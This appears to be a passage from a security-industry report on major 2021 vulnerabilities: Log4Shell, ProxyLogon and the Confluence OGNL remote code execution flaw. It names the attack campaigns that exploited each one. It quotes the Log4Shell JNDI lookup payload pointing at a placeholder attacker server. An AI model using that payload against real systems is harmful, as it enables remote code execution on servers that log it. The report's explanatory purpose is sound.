High Profile Global Vulnerabilities

Apache Log4j is an open-source Java-based logging package provided by the Apache Software Foundation, as part of the Apache Logging Services. It is the most popular Java logging library, used by millions of Java-based applications worldwide to record activities such as routine system operations and error messages and to send diagnostics to system admins. On December 9, the Apache Foundation released an emergency Log4j version to address a critical flaw in the logging framework. This flaw enables threat actors to compromise a machine by sending it a simple string such as '${jndi:ldap://attacker_server/path}' as part of the HTTP request, User-Agent or any other input likely being logged by the server using Log4j. By controlling the messages logged via the logging package, arbitrary code could be executed from a remote server. Called ‘Log4Shell’, the vulnerability took the security community by storm due to its far-reaching effects on millions of companies, including Cisco, Twitter, Cloudflare, Tesla, Amazon and Apple, that use Log4j. Widespread exploitation of the flaw was observed almost immediately, both by low skilled attackers to distribute ryptominers, as well as by state sponsored APT groups, to gain access to corporate networks. According to Check Point Research approximately 48.3% of organizations were affected by exploitation attempts of the Log4Shell Vulnerability in 2021.

ProxyLogon is the name given by researchers from DEVCORE to an authentication bypass vulnerability (CVE-2021-26855) first discovered and reported in late 2020. When combined with other vulnerabilities (CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), this infection chain can lead to remote code execution on any unpatched mainstream Exchange Server. ProxyLogon has been exploited in the wild by several APT groups. In August, Earth Baku launched a campaign in the Indo-Pacific region using SQL injection and exploiting ProxyLogon as entry vectors. In September, the FamousSparrow cyberespionage group exploited the flaw as well as backdoor SparrowDoor on hotel chains, governments, private businesses and various other sectors worldwide. Another threat group, SquirrelWaffle, was seen hacking Microsoft Exchange servers with ProxyShell and ProxyLogon to spread malware through malicious emails.

This critical Remote Code Execution in Atlassian Confluence Server or Confluence Data Center flaw, made public in August 2021, is derived from the Object Graph Navigation Language. It can be exploited without authentication, allowing a remote attacker to execute arbitrary code on the affected system. Atlassian released patches for the affected enterprises and several Proof of Concept exploits were published. Threat actors subsequently scanned for the vulnerability with the aim of installing cryptominers. In September, the z0Miner cryptojacker attempted to conduct mining operations on vulnerable machines. In October, the Atom Silo ransomware operator was observed exploiting unpatched computers to launch ransomware attacks.